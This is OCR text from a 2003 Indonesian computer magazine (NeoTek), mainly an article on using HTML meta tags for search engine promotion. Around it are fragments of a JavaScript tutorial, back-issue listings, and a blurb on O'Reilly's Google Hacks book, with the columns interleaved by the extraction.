var Motor = new Kendaraan("Motor",2) 1. Programmer MC68HC908-KX8
Masih Ada: NeoTek (klasik) Vol. I
var Sepeda = new Kendaraan("Sepeda",2) 2. Merakit Hardware Digital Clock (untuk pemula dalam ber-Internet)
var Becak = new Kendaraan("Becak",3) 3. Tutorial Assembly Language
4. Tukar Otak Proyek Digital Clock (1) Bundel I: NeoTek Vol. I No. 1-6
Maka kemudian kita dapat mendefi- 5. Tukar Otak Proyek Digital Clock (2) Rp25.000,-
nisikan sebuah fungsi objek Library 6. Mini EVM Development Tool Bundel I: NeoTek Vol. II No. 7-12
dari instan-instan yang ada. Perhati- 7. Assembly: Mengenal Hardware (1) Rp25.000,-
kan contoh berikut: Yang ditunda pemuatannya; NeoTek Vol I (per nomor lepas 1 s/d 12)
Rp3000,- per eks.
function Library(){ 8. Assembly: Mengenal Hardware (2)
this.jenis = new Array(arguments.length)

Mei/Jun 2003 NeoTek 37


NeoStyle

W E B S I T E D E V E LO P M E N T
Metatag untuk Promosi Situs
Bagaimana agar situs kita masuk dalam ranking atas search engine utama seperti Google,
Yahoo!, AltaVista, dan lainnya? Juneman Abraham (neumanmail@yahoo.com) membagikan
pengalamannya mempromosikan situs dengan memanfaatan meta tag.

eta Tag adalah tag HTML yang memungkinkan se- nya, halaman web yang full Flash, halaman yang mengguna-
M orang webmaster menyajikan informasi mengenai
sebuah dokumen HTML atau halaman web. Infor-
kan frame—tanpa keterangan yang memadai pada tag
<noframes></noframes>-nya, dan sebagainya. Padahal, sebuah
masi ini disebut sebagai meta data. Meta tag dan meta data search engine (dalam hal ini, index/catalogue) pada umumnya
tidak tampak ketika kita membuka atau mengakses sebuah mengambil informasi dari yang bersifat teks tadi, yang akan
halaman web, karena keduanya memang bukan merupakan ditampilkan pada pengguna search engine sebagai hasil retrieval.
isi informasi (content) itu sendiri dari sebuah halaman web. Sayang sekali, dalam kenyataannya tidak semua webmaster
Namun keduanya (meta tag dan meta data) dapat kita lihat menerapkan secara benar penggunaan meta tag sesuai dengan
bila kita melakukan View (Page) Source kode HTML-nya, maksud utamanya; dan justru lebih banyak yang menyalah-
yaitu pada bagian kepala (header) dokumen HTML, di antara gunakannya dengan melakukan spamming. Artinya, infor-
tag <head></head>. Sintaks dari sebuah meta tag: masi yang disajikan pada meta tag sering dimanipulasi se-
<meta name="…" content="…" /> hingga tidak berhubungan sama sekali dengan isi (content)
Catatan: situsnya, dengan harapan banyak orang "tersasar" ke situs-
1. Meta tag selalu berada di antara tag <head> </head> dan tidak memiliki nya. Tujuannya untuk meningkatkan traffic dan ranking dari
tag penutup. situsnya. Semakin banyak traffic artinya semakin banyak
2. Nilai (value) dari atribut content harus memakai tipe data CDATA (lebih peluang untuk menghasilkan uang (meskipun anggapan ini
lanjut: http://www.w3.org/TR/REC-html40/types.html). telah terbukti salah, karena kualitas kunjungan ternyata
3. Tidak boleh terdapat line break (menekan Enter pada keyboard) dalam masih lebih penting).
tiap-tiap meta tag
Tetapi sekarang spamming dengan meta tag ini sudah dapat
Tidak ada ketentuan baku, informasi apa saja yang dapat atau dideteksi oleh kebanyakan search engine. Algoritma yang
tidak dapat ditulis dalam sebuah meta tag. Namun memang lebih modern (algoritma bisa berubah setiap saat!) membuat
ada meta tag yang digunakan oleh browser (seperti meta cha- search engine semakin cerdas dalam menentukan halaman-
racter set), ada meta tag yang digunakan oleh search engine halaman web mana yang telah melakukan spamming, dan
(seperti meta description), ada meta tag untuk berkomunikasi sebagian langsung memfilternya (tidak didaftarkan ke dalam
dengan server (seperti meta expires), dan ada meta tag yang index). Namun hal yang terakhir disebut ini hanyalah reaksi
hanya untuk dibaca oleh manusia atau search engine internal/ pertama dari kebanyakan search engine besar terhadap tin-
intranet (seperti meta author). Tulisan ini akan difokuskan dakan spamming yang sudah-sudah.
pada yang kedua, yaitu meta tag untuk search engine (global/
internet), khususnya dalam kaitannya dengan promosi situs. Reaksi kedua dari search engine yang cukup penting untuk
dicatat, sebelum kita masuk ke inti uraian pemanfaatan meta
Tiap-tiap search engine di dunia maya memiliki cara, rumusan tag, adalah: search engine mengurangi secara signifikan per-
(atau, "aalgoritma") tersendiri dalam melakukan pemeringkat- hatian terhadap meta tag (terkecuali meta robots). Informasi
an sebuah situs. Algoritma ini di antaranya mencakup cara di dalam meta tag tidak lagi serelevan (sepenting) dahulu bagi
search engine (dalam hal ini, robot/spider/crawler) membaca, kebanyakan search engine sekarang ini dalam menentukan isi
menginterpretasikan, dan memperlakukan meta tag. Sampai sebuah halaman web, dengan demikian juga hasil retrieval-nya.
dengan saat ini diyakini bahwa tidak ada satu pun "orang luar"
yang mengetahui dengan persis algoritma yang digunakan Bahkan faktanya, sekarang ini tidak semua search engine di in-
oleh masing-masing search engine. Memang, ada beberapa ternet dirancang untuk dapat membaca meta tag. Dan bagi search
search engine yang memiliki dokumentasi yang dapat dibaca engine yang dapat membaca meta tag, tidak semua meta tag
oleh publik mengenai algoritma yang digunakannya; namun, didukung olehnya. Kalaupun ada meta tag yang didukung, masih
tetap diyakini bahwa informasi di dalamnya pun tidak seratus ada kemungkinan untuk tidak didukung secara penuh. Dalam
persen sebagaimana adanya. Meskipun demikian, kita dapat uraian selanjutnya akan ditunjukkan hal-hal tersebut. Fakta
memperoleh gambaran mengenai hal tersebut dengan meng- lainnya, kebalikannya sekarang ini tidak sulit kita jumpai situs-
amati perilaku dari search engine tersebut, dengan memban- situs yang berada pada peringkat atas (sepuluh besar) pada
dingkan berulang-ulang antara input pencarian yang kita hasil retrieval tanpa menggunakan meta tag sama sekali.
masukkan dengan hasil penemuan informasi (retrieval)-nya. Namun, bila memang demikian, apakah kita bisa mengabaikan
Maka, uraian ini pun kiranya menggunakan pendekatan ini. meta tag sama sekali ? Jawabnya tentu saja bisa meskipun
Meta tag hadir sejak HTML 3.2 dan didukung oleh sebagian tidak harus. Meta tag akan cukup memberikan andil bagi pro-
search engine dengan maksud utama, seperti telah disebutkan mosi situs ketika kita menggunakannya secara benar (sesuai
di atas, menyajikan informasi mengenai sebuah halaman web; dengan maksudnya). Maka, hubungan antara meta tag dengan
khususnya bagi halaman-halaman web yang kurang memili- promosi situs dalam uraian ini adalah: bagaimana menyajikan
ki informasi yang bersifat teks. Misalnya, halaman web yang meta data (informasi dalam meta tag) secara tepat agar spider
hanya berisi gambar (image)—tanpa atribut "alt" pada tag- dapat menyerap informasi ini dengan baik dan mendaftarkannya
pada index. Sehingga apabila ada para pengguna (user) search

38 NeoTek Mei/Jun 2003


NeoStyle

narik perhatian, meskipun tetap harus ada faktanya. Dengan


demikian, kalimat dalam meta description sesungguhnya ha-
nyalah menguatkan isi (content) dari halaman web. Artinya,
content-nya harus "beres" terlebih dahulu dalam hal kuali-
tasnya (struktur, kejelasan informasi, dsb).
Kriterita lainnya yang lebih teknis adalah: tempatkan frasa
(kelompok kata) yang kita anggap penting pada awal kalimat.
Memang ada baiknya kalau kita bisa memuat satu atau dua
kata kunci (keyword) terpenting di dalam meta description
• Situs EvaBun muncul di ranking kesembilan pada hasil retrieval (misalnya berupa produk atau jasa yang kita tawarkan, seperti:
Google, dengan keyword "gaun pengantin". Situs ini tidak "cd/vcd ", "sepatu", "penerjemah", "makanan", dsb). Namun,
menggunakan meta tag untuk search engine sama sekali. jangan mengulang keyword yang sama lebih dari tiga kali di
engine yang mencari informasi yang berhubungan dengan te- dalam meta description agar tidak dianggap spider sebagai
ma situs kita, ia dapat dengan mudah menemukannya pada spamming. Lain keyword lain pula ranking halaman situs-
hasil retrieval. Artinya, mereka sampai pada situs kita karena situs pada hasil retrieval. Karena itu, jangan berusaha mema-
mereka memang sedang mencari situs kita (situs kita relevan sukkan sebanyak mungkin keyword, yang membuat kalimat
dengan kebutuhan pencariannya). Dengan demikian, traffic menjadi tidak wajar. User yang membaca akan kurang ter-
dan ranking yang tinggi pun sudah di depan mata. tarik untuk mengklik situs Anda.
Sebenarnya hanya ada dua meta tag yang penting untuk pro- Kemudian, untuk menghemat tempat (karena kita dibatasi—
mosi situs, yaitu meta description dan meta keywords; dan dijelaskan nanti), kita tidak perlu menempatkan nama insti-
yang terpenting di antaranya adalah meta description. Dalam tusi atau perusahaan kita di dalam meta description jika be-
kaitannya dengan promosi situs juga, meta PICS-Label perlu lum banyak dikenal orang; karena, bila memang demikian,
dipertimbangkan, dan meta robots perlu diketahui. sangat kecil kemungkinan user akan mencari nama tersebut
pada search engine. Sebagai gantinya, tuliskan apa saja yang
Meta Description institusi kita hendak tawarkan (produk barang, jasa, dsb).
Sintaks meta description: Apabila kita kurang ide untuk menulis kalimat meta descrip-
<meta name="description" content="description" /> tion, penulis menyarankan untuk meng-copy/paste 1–2 kali-
mat dalam paragraf pertama dari content kita, yang kira-kira
Meta description memuat satu atau dua kalimat yang meru- mampu memberi gambaran mengenai apa isi halaman web kita.
pakan ikhtisar (summary) atau abstraksi mengenai isi sebuah
halaman web (web page), termasuk apa yang ingin kita tawar- Panjang kalimat dalam meta description sebaiknya cukup
kan dari situs kita. Kalimat ini tidak nampak ketika kita meng- 20–25 kata atau 150–200 karakter. Usahakan jangan lebih
akses sebuah halaman web dengan browser, tetapi akan ditam- atau kurang. Apabila lebih dari itu, kalimat mungkin terlalu
pilkan sebagai hasil retrieval oleh search engine yang men- panjang dan harus terpotong di tengah pada hasil retrieval,
dukung meta description. Hampir semua search engine men- sehingga kelihatan kurang profesional pada saat dibaca. Di
dukung meta description, meskipun tidak secara penuh. Yang samping itu, manusia yang membaca tidak bisa memperoleh
memberi dukungan penuh (selalu menampilkan meta descrip- gambaran yang utuh mengenai situs kita (ini sebab mengapa
tion) misalnya: AltaVista (www.altavista.com) dan AllTheWeb kita perlu menempatkan keyword-keyword terpenting di
(www.alltheweb.com). awal-awal kalimat).
Kalimat dalam meta description adalah kalimat yang deskriptif
(menggambarkan) dan memuat pemikiran atau pun sinonim
(pengkalimatan lain) dari pemikiran mengenai isi halaman
web kita. Hal ini bisa dibandingkan dengan sinopsis sebuah
film atau buku, atau bagian abstrak dari sebuah karangan il-
miah. Seperti halnya sinopsis atau abstrak, isinya sudah tentu
harus sesuai dengan content apa adanya, tidak melebihkan • Melaka Street Restoran mempromosikan dirinya melalui situs eGenting,
atau mengurangi substansi dari suatu content. Di samping itu muncul di ranking kesembilan pada hasil retrieval AltaVista, dengan keyword
juga memiliki arti yang jelas dilihat dari susunan kalimatnya "restoran chinese food". Meta description yang lengkap dari halaman ini adalah:
(yang efektif, wajar, tidak dibuat-buat). "Melaka Street Restoran. New food outlet at Lebuh Ampang, Kuala Lumpur
city. Local delicacies comprising Mamak, Malay, Indian and Chinese food. Its
"Kriteria-kriteria" semacam di atas menjadi penting karena specialties are capati, roti canai, tosai and mee goreng. Sold at reasonable prices.
isi dari meta description akan dibaca oleh manusia pada entri Food sold are halal."
hasil retrieval dari beberapa search engine. Bayangkan, misal- Sayangnya pada hasil retrieval, deskripsi ini terpotong sampai "tosai and…"
karena terlalu panjang. Informasi yang kiranya cukup penting bahwa makanan
nya, bila apa yang kita deskripsikan kemudian terbukti bohong yang dijualnya halal, tidak kelihatan. Kalau saja ditulis sebagai berikut, tentu
(tidak apa adanya) pada saat user meninjau isi situs kita. akan lebih efektif:
Akibatnya harus siap kita tanggung, yaitu user tsb tidak akan Pada <title></title>:
pernah lagi mengunjungi situs kita karena pengalaman tak "Melaka Street Restoran, new food outlet at Lebuh Ampang, Kuala Lumpur"
menyenangkan yang dialaminya, yaitu membuang-buang Pada meta description:
waktu untuk menelusuri informasi yang sebenarnya tidak "We comprise Mamak, Malay, Indian, Chinese food. Food sold are halal.
Specialities: capati, canai, tosai, mee goreng. At a reasonable prices!"
sedang ia cari saat itu. Kita akan mudah kehilangan keperca-
Jika Melaka Restoran memiliki situs sendiri, ia dapat menempatkan meta des-
yaan dari user. Bukankah hal ini malah kontraproduktif de- cription ini pada halaman muka (homepage)—index.html, karena merupakan
ngan maksud promosi situs? gambaran keseluruhan. Pada halaman berikutnya title dan meta description-
nya bisa lebih khusus lagi mengenai masing-masing makanannya.
Di samping kriteria yang telah disebutkan, kalimat dalam
meta description juga hendaknya dapat memotivasi pengu- Catatan: eGenting cukup baik dalam hal menuliskan meta description di
setiap halaman-nya, khususnya yang menginformasikan produk, sehingga
njung untuk mengetahui lebih jauh apa isi halaman web kita. penulis juga dapat menjumpai eGenting kembali pada rangking kesembilan,
Karenanya, kita bisa menggunakan kalimat yang dapat me- dengan keyword "restoran seafood".

Mei/Jun 2003 NeoTek 39


NeoStyle

Pentingnya menjaga panjang kalimat dapat kita mengerti sbb: kata (sebuah phrase), maka salah satu kata dalam keyword tsb
Katakanlah situs kita muncul pada entri kesatu pada sepuluh harus terdapat di dalam <body></body> sedikitnya 4 kali
entri teratas, namun tentunya user akan lebih termotivasi dan terdapat dalam meta description sedikitnya 1 kali. Kata
untuk meng-klik entri dari situs yang bisa lebih utuh meng- lainnya harus terdapat sedikitnya 1 kali dalam <body></body>
gambarkan dirinya (dan itu mungkin situs milik saingan kita), dan 1 kali dalam meta description. Hal ini nampaknya ber-
karena situs itu dianggap lebih relevan bagi si user. Demikian laku juga bagi Yahoo—yang kini juga di-backup—oleh Google.
pula halnya akan terjadi dengan kalimat yang terlalu pendek,
yang kurang deskriptif.
Bila kita merasa bahwa kita terlalu dibatasi dengan kriteria
150–200 karakter, kemungkinan isi dari halaman web terse-
but terlalu banyak. Kita bisa mengambil solusi dengan mem-
bagi halaman tersebut menjadi dua atau bahkan tiga halaman
yang memiliki meta description masing-masing; karena, se-
perti yang telah disebut di atas, meta description memang
menggambarkan isi sebuah halaman web. Artinya juga, kita
"wajib" menempatkan meta description pada setiap halaman • Meta description dari situs Kamus Jot muncul pada hasil retrieval Google,
web (web page) di dalam situs (web site) kita. Setiap halaman dengan keyword "kamus jerman". Jika kita masuk ke situs tsb, kita akan
memiliki tema masing-masing, sehingga juga memiliki gam- menjumpai 2 kata "kamus", 1 kata "jerman" dalam meta description; 6
baran (description) masing-masing yang tentu berbeda antara kata "kamus" dan 1 kata "jerman" dalam <body></body>. Perhatikan
bahwa deskripsi situs ini ada dua macam: satu dari meta description (tepat
satu halaman dengan lainnya (misalnya, halaman "Profil" di bawah judul situs) dan satu lagi dari ODP (setelah kata Description).
berbeda deskripsinya dengan "Produk"). Kecuali adalah pada
halaman muka (homepage)—index.html—biasanya meta des-
cription diisi dengan gambaran secara keseluruhan mengenai
isi sebuah situs (web site).
Seperti yang telah kita lihat di atas, meta description cukup
memegang peranan pada hasil retrieval. Lalu, bagaimana jika
sebuah halaman tidak memiliki meta description pada
<head></head>-nya? Ini akan menyadarkan kita akan
pentingnya meta description. Ada dua kemungkinan yang
muncul pada hasil retrieval, sbb: • Meta description dari situs eBook Perkembangan dan Psikologi Anak Balita
Menggunakan Snippet muncul pada hasil retrieval Google, dengan keyword "buku psikologi anak".
Jika kita masuk ke situs tsb, kita akan menjumpai 1 kata "buku", 1 kata
1) Search engine seperti Google (www.google.com), Teoma "psikologi", 1 kata "anak" dalam meta description; 18 kata "buku", 2 kata
(www.teoma.com), Yahoo (www.yahoo.com) dan AllTheWeb "psikologi" dan 58 kata "anak" dalam <body></body>.
akan memberikan sebuah "snippet", yakni sebuah kutipan
yang diambil dari halaman web tersebut, di mana di dalam- Kedua, Google menampilkan meta description apabila keyword
nya terkandung kata atau frasa yang sedang dicari (untuk yang dicari persis terdapat di dalam meta description dari se-
Google dan Yahoo diberi tanda tebal); sehingga user dapat buah halaman yang menggunakan frame yaitu tidak terdapat
segera mengetahui dalam konteks apa kata atau frasa yang keterangan yang memadai pada tag <noframes> </noframes>-
dicarinya itu digunakan dalam informasi halaman web tsb. nya, atau dari sebuah halaman yang tidak mengandung teks
(hanya berisi Flash, JavaApplet, dsb).

• Dengan snippet yang dimunculkan oleh Google pada hasil retrieval, kita
dapat segera mengetahui dalam konteks apa keyword "ikan koi" • Meta description dari halaman Garuda Indonesia muncul pada hasil
digunakan. retrieval Google, dengan keyword "garuda indonesia uk" (halaman web
tsb hanya berisi Flash). Hal ini karena kata-kata dalam keyword yang dicari
terdapat dalam meta description.
Catatan untuk Google dan Yahoo:
a. Google termasuk search engine yang mendukung meta des-
cription tidak secara penuh, artinya meta description tidak se-
lalu ditampilkan pada hasil retrieval, sehingga dalam penga-
laman kita mungkin akan lebih sering mendapati snippet dari-
pada meta description.
Namun, dari hasil pengamatan berkali-kali, penulis dapat
menyimpulkan:
Pertama, Google menampilkan meta description apabila key-
word (single word) yang dicari terdapat di dalam <body>
</body> dengan frekuensi sedikitnya 4 (empat) kali dan key- • Meta description dari halaman Millenium Bowling Club muncul pada hasil
word yang sama tsb terdapat sedikitnya 1 (satu) kali di dalam retrieval Google, dengan keyword "club bowling indonesia" (halaman web
meta description. Apabila keyword yang dicari lebih dari satu tsb hanya berisi JavaApplet), karena kata-kata dalam keyword yang dicari
terdapat di dalam meta description.

40 NeoTek Mei/Jun 2003


NeoStyle

b. Google selalu menggunakan deskripsi dari editor Open Dir- 2. Sedapat mungkin, cantumkan keyword berupa frasa (phrase),
http://dmoz.org), jika situs yang dicari terdaf-
ectory Project (h karena ini lebih spesifik, jangan hanya kata (single word). Per-
tar pada direktori tsb. Jadi deskripsi yang muncul pada hasil timbangkan bahwa user jarang mencari "buku" saja, tetapi ia
retreival dapat merupakan: dari meta description dan atau dari mungkin ingin mencari "buku Pramoedya", "buku fisiologi
ODP. Sedangkan untuk Yahoo, bila sebuah situs telah terdaftar kedokteran", dsb.
di direktori Yahoo (hhttp://dir.yahoo.com/), maka deskripsi 3. Setiap keyword yang dicantumkan pada meta keywords
yang muncul hanya satu, yaitu deskripsi dari editor Yahoo. harus sudah muncul di dalam <body></body> sekurang-ku-
Menggunakan Frasa rangnya 4 (empat) kali. Ini menegaskan bahwa keyword tsb
2) Search engine seperti AltaVista akan menampilkan frasa memang spesifik dan relevan (berhubungan) dengan isi ha-
atau kalimat yang terdapat pada awal sebuah halaman web. laman web kita. Jadi, jika terdapat minimal empat keyword
Konsekuensinya, bila awal dari sebuah halaman web berupa yang sama di dalam <body></body>, maka ini akan diwakili
teks-teks link untuk menu (navigasi) situs, maka itu juga oleh satu keyword pada meta keywords.
yang akan ditampilkan. 4. Apabila keyword itu berupa sebuah kata (single word),
jangan pernah mengulangnya. Apabila keyword itu berupa
frasa, jangan mengulang kata yang terdapat dalam frasa itu
dalam keyword yang lain lebih dari 3 (tiga) kali, agar tidak
dianggap spamming oleh spider.
• Bila tidak ada meta description, kata-kata atau kalimat-kalimat awal darii Contoh:
halaman web yang akan dimunculkan. Spamming: <meta name="keywords" content="vcd, film,
jerman, vcd, dokumenter, jerman" />
Catatan untuk AltaVista:
Apabila sebuah halaman web memiliki meta description, Bukan spamming: <meta name="keywords" content="jual
AltaVista akan selalu memunculkan meta description-nya. vcd, rental vcd, vcd film jerman, dokumenter jerman, film
Namun apabila meta description-nya cukup pendek, AltaVista german" />
akan menampilkan meta description bersama dengan frasa 6. Keyword dapat diambil dari tag <title></title> dan itu
atau kalimat awal tadi. ditempatkan sebagai keyword-keyword awal.
Contoh:
Jika pada sebuah halaman:
<title>Ruang Konsultasi Online Kesehatan Reproduksi
Remaja</title>,
• Meta description dari PenerbitNet ini hanya berbunyi, "Majukan Dunia pada meta keywords:
Buku Indonesia!" Masih ada tempat yang bisa dimanfaatkan untuk lebih <meta name="keywords" content="konsultasi online,
menggambarkan situs ini. kesehatan reproduksi remaja, … " />
Akhirnya, ingat sekali lagi bahwa tujuan meta description yang 7. Keyword sebaiknya ditulis dalam huruf kecil semua (lower-
utama bukanlah untuk mencapai ranking yang tinggi, melain- case). Sekalipun sebuah search engine membaca keyword sec-
kan memberikan informasi yang akurat mengenai sebuah ara case senstive (huruf kapital dan huruf kecil dibedakan),
halaman web. Maka evaluasilah meta description Anda hari statistik menunjukkan bahwa sebagian besar user menge-
ini, bila Anda memang telah menggunakannya. Coba lakukan tikkan input pencariannya dalam huruf kecil.
pencarian terhadap situs Anda sendiri pada search engine, bagai- 8. Kita dapat menempatkan misspelled words dalam keyword
mana deskripsi yang muncul? Buruk? Baik? Selanjutnya (frasa) kita. Seperti: Jogjakarta, Yogyakarta; thesis, tesis; modern,
terserah Anda… moderen; metamorfosa, metamorfose, metamorfosis; Perancis,
Meta Keywords Prancis; foto, photo; komputer, computer; dan sebagainya. Jika
situs Anda dalam bahasa Inggris, lihat daftar yang terdapat pada
Sintaks meta description: http://www.library.cornell.edu/tsmanual/TSSU/comis1.html
<meta name="keywords" content="keyword1, keyword2, mungkin akan membantu Anda.
keyword3, keyword4, dst " />
Meta keywords adalah kata-kata dan atau frasa kunci yang
mewakili isi (content) halaman web kita, yang kita perkirakan
akan diketikkan user dalam kotak pencarian pada search engine
pada saat mereka mencari informasi yang berhubungan dengan
tema situs kita. Jumlah keyword sebaiknya cukup 6-10, dipi-
sahkan satu dengan lainnya dengan tanda koma dan satu spasi
(lihat sintaks di atas), atau sekitar 100-120 karakter (termasuk
spasi dan tanda koma). Hampir semua search engine sangat
kurang memperhatikan meta keywords, karena tingginya
penyalahgunaan pada waktu yang lalu. Namun, search engine
seperti Teoma dan Inktomi (yang kabarnya akan diakuisisi • Situs useit.com milik Jakob Nielsen muncul pada hasil retrieval Google
Yahoo) cukup memberi perhatian. dengan keyword "Jacob Neilson", padahal pada <body></body>-nya
sama sekali tidak terdapat kata "Jacob" maupun "Neilson". Hal ini
Beberapa hal yang perlu diperhatikan dalam menyusun meta dimungkinkan karena pada meta keywords-nya ditulis sbb:
keywords: <meta name="keywords" content="Jakob Nielsen, Jacob Nielsen, Jakob
Nielson, Neilsen, Neilson, …>
1. Setiap halaman web tentunya memiliki isi yang berbeda, Kita dapat menambahkan misspelled words dan sinonim suatu kata pada
untuk itu tempatkan meta keywords pada <head></head> meta keywords, asalkan morfologi katanya berdekatan.
setiap halaman web dari situs kita. Google masih memperhatikan meta keywords!

Mei/Jun 2003 NeoTek 41


NeoStyle

9. Kita tidak dapat menggunakan sinonim yang terlalu jauh Misalnya:


morfologi katanya, seperti kursus dan pelatihan; kecuali kata <meta http-equiv="Certification"
yang menjadi sinonim itu terdapat juga di dalam <body></body> content='"http://www.ufcws.org/license.html" l r true
(lihat nomor 3). Sebab, bila tidak demikian, pencatuman sino- comment "United Federation of ChildSafe Web Sites" for
nim ini akan dianggap spamming. "http://situs-anda.com" on "2003.02.10" r"'>
10. Algoritma modern beberapa search engine mengarah pada Menariknya, kita dapat mendaftarkan URL situs Anda pada
apa yang dinamakan "Search Engine Themes" untuk kete- direktori khusus untuk situs-situs yang telah diberi label ini
gorisasi informasi. Dalam hal ini, penting untuk menempat- pada http://www.surfsafely.com/urladd.html . Ada direktori
kan 1–2 keyword yang sama pada meta keywords (atau juga, untuk situs-situs bisnis, hiburan, literatur, belanja, pendidik-
meta description) pada setiap halaman web kita. Karena kita an, olah raga, keluarga, keuangan, komputer, dsb—sesuaikan
mempertimbangkan nomor 3 (lihat di atas), maka keyword dengan tema situs kita. Paling lambat dua minggu setelah
ini sebaiknya juga terdapat di dalam <body></body>. didaftarkan, situs kita sudah dapat di-search pada direktori tsb
Contoh: jika situs Anda menjual kamera digital, usahakan agar (http://surfsafely.com/directory/ ). Hasil retrieval-nya adalah
di setiap halamannya terdapat frasa "kamera digital". Hal ini berupa judul dan deskripsi situs kita yang diambil dari meta
untuk mengindikasikan kepada spider bahwa situs kita me- description situs kita.
miliki satu kesatuan tema ("kamera digital"). Satu kesatuan
tema berkaitan dengan relevansi (dengan input pencarian yang
sesuai dengan tema situs kita), dan relevansi dapat mening-
katkan ranking situs (website).
11. Yang perlu diketahui:
a) Pada keyword yang berupa frasa berlaku permutasi. Artinya,
keyword "hotel indonesia" dapat muncul pada hasil retrieval
dengan input "indonesia hotel".
b) Apabila ada keyword "perikanan" maka ini sudah mencakup
"ikan", artinya halaman web Anda yang berisi dapat "perikanan"
muncul pada hasil retrieval dengan input "ikan". Tetapi, tidak
sebaliknya.
Untuk mengetahu keyword- keyword yang tepat, sebuah • http://travelforum.org/bali/ tercantum pada salah satu direktori SafeSurf,
analisis keyword mungkin akan berguna. Hal ini di antara- karena itu dapat muncul hasil retrieval dengan keyword "bali lombok
travel". http://travelforum.org/bali/ muncul juga di ranking keempat pada
nya dapat dilakukan dengan memasang search engine lokal hasil retrieval Google dengan keyword yang sama. Link analysis dapat
(khusus untuk situs kita) yang dapat merekam dan mela- mempengaruhi ranking pada Google.
porkan keyword-keyword apa saja yang telah diketikkan
Karena SurfSafely sangat menjaga kualitas direktorinya, maka
pengunjung. Layanan gratis dari FreeFind (www.freefind.com)
dalam hal promosi situs, tercantumnya link situs kita pada di-
layak dicoba untuk memahami hal ini. Namun, sekali lagi,
rektori SurfSafely dapat meningkatkan relevansi situs kita, dan
keyword yang ingin Anda tambahkan pada meta keywords
ini akan mempengaruhi link analysis yang digunakan oleh
juga harus terdapat pada <body></body>; jadi, jangan
search engine sekarang ini untuk menentukan ranking. Link
sekadar menambahkannya dengan keyword-keyword hasil
analysis itu sendiri adalah suatu algoritma baru (yang cukup
laporan dari FreeFind.
penting) yang digunakan oleh search engine seperti Google
Akhirnya, perlu ditegaskan bahwa maksud utama meta key- untuk menentukan relevansi sebuah situs dengan tema ter-
words adalah agar user dapat dengan segera menemukan tentu, yaitu dengan menganalisis bagaimana situs kita di-link
dengan tepat informasi yang ingin ia temukan; bukan secara oleh halaman situs lain yang temanya berhubungan dengan
langsung untuk meningkatkan ranking sebuah situs. situs kita. Link analysis adalah bagian dari faktor "off the page"
yang akan menentukan ranking situs kita, namun tidak mudah
Meta PICS-Label kita kontrol (Bandingkan dengan faktor "on the page" seperti
Sintaks meta PICS-Label organisasi content, penulisan title dan meta tag, dsb, yang
dapat kita kontrol setiap saat).
<meta http-equiv="PICS-Label" content="..." />
Meta PICS-Label (PICS = Platform for Internet Content Meta Robots
Selection) adalah sebuah protokol yang mengenali suatu Seperti yang telah disebutkan pada awal uraian ini, meta
sistem pe-rating-an yang didasarkan atas isi informasi sebuah robots adalah meta tag yang paling didukung oleh sebagian
situs, seperti: aman bagi anak-anak, aman untuk umum, aman besar search engine.
untuk orang dewasa, dsb. Sampai saat ini PICS baru browser
Internet Explorer yang menerapkan sistem ini, yaitu orang Sintaks meta robots:
tua dapat mengatur isi situs yang bagaimana yang dapat di- <meta name="robots" content="Value" />
akses oleh browser tsb untuk kepentingan anak-anaknya. Satu
Value dari content ini bisa berupa:
di antara yang mengadakan sistem pe-rating-an ini adalah
SafeSurf. Untuk mengetahui lebih lengkap apa itu PICS-Label index
dan SafeSurf, silakan kunjungi http://safesurf.com/ssfaq.htm. Artinya: isi dari halaman web (web page) tersebut dimasukkan
Pada prinsipnya, kita dipersilakan me-rating sendiri (tentunya ke dalam index oleh spider, sehingga seluruh isi dari halaman
dengan jujur) situs kita pada http://safesurf.com/classify/, web ini bisa ditemukan melalui pencarian dari search engine.
kemudian kita akan menerima e-mail pemberitahuan melalui follow
e-mail untuk mencantumkan sebuah meta tag untuk memberi Artinya: semua link ( <a href="…"></a> ) akan ditelusuri
label terhadap situs kita (cukup sekali pada <head></head> oleh spider.
dari index.html) sesuai dengan rating-nya.

42 NeoTek Mei/Jun 2003


NeoStyle

noindex
Artinya: spider tidak memasukkan seluruh informasi yang
POWE R S EARC H
terdapat pada halaman web tersebut ke dalam index, tetapi
tetap menelusuri semua link yang ada di dalamnya. Utak-utik Google
nofollow ukan cuma komputer atau
Artinya: spider tidak menelusuri semua link yang terdapat B jaringan bisa di-hack, search
engine seperti Google juga
pada seluruh halaman web tersebut, tetapi tetap memasukkan
seluruh informasi yang ada halaman tsb ke dalam index. bisa di-hack dan pihak Google se-
ndiri mendukung usaha meng-hack
Catatan: index dan follow adalah nilai default untuk meta Goofle. Meng-hack Google di sini
robots, artinya inilah yang akan dikerjakan oleh spider mes- artinya mengutak-utik Google agar
kipun tidak ada meta robots sama sekali: spider selalu ber- kita dapat semakin meningkatkan
usaha memasukkan semua informasi dari semua halaman pemanfaatannya. O’Reilly menjadi
dalam sebuah situs untuk dimasukkan ke dalam index. penerbit pertama yang membahas
Jadi meta robots bermanfaat apabila kita ingin agar halaman- cara meng-hack search engine yang paling populer ini. Bagi
halaman tertentu dalam situs kita tidak dapat diketahui keber- yang tidak memiliki bukunya, O’Reilly membuka sedikit
adaanya oleh user lain melalui search engine (tiidak dapat di- beberapa tip meng-hack Google lewat situsnya:
search). Tiap-tiap halaman yang demikian itu harus ditam- http://hacks.oreilly.com/pub/ht/2
bahkan kode berikut dalam tag <head></head>-nya:
Ada 100 hack tip dalam buku ini yang dibagi atas:
<meta name="robots" content="noindex" />
• Searching Google
Ada satu Value lagi yaitu noarchive. Search engine seperti • Google Special Services and Collections
Google menyimpan informasi sebuah halaman ke dalam
• Third-Party Google Services
cache-nya, di samping dalam index-nya, yang bisa dibuka
dengan meng-klik link Cached pada setiap hasil retrieval. Tu- • Non-API Google Applications
juannya, sebagai antisipasi, bila server situs dari halaman web • Introducing the Google Web API
yang bersangkutan tidak aktif sementara, user masih bisa me- • Google Web API Applications
lihat isi halaman web tersebut dengan meng-klik link Cached. • Google Pranks and Games
Apabila kita tidak menginginkan adanya cached version ini, • The Webmaster Side of Google
tuliskan noarchive pada meta robots. Namun demikian, snippet
yang sesungguhnya merupakan bagian dari cached version Pada setiap bagian dibuka satu tip (kalau mau tahu semuanya
tetap akan tetap muncul pada hasil retrieval. harus membeli bukunya), yaitu:
Kita dapat menggabungkan noindex dengan noarchive Hack #5 Getting Around the 10 Word Limit
dengan menambahkan tanda koma dan satu spasi, sbb: There are some clever ways around Google's
limit of 10 words to a query
<meta name="robots" content="noindex, noarchive" />
Hack #17 Consulting the Phonebook
Kode di atas sama dengan: Google makes an excellent phonebook, even to
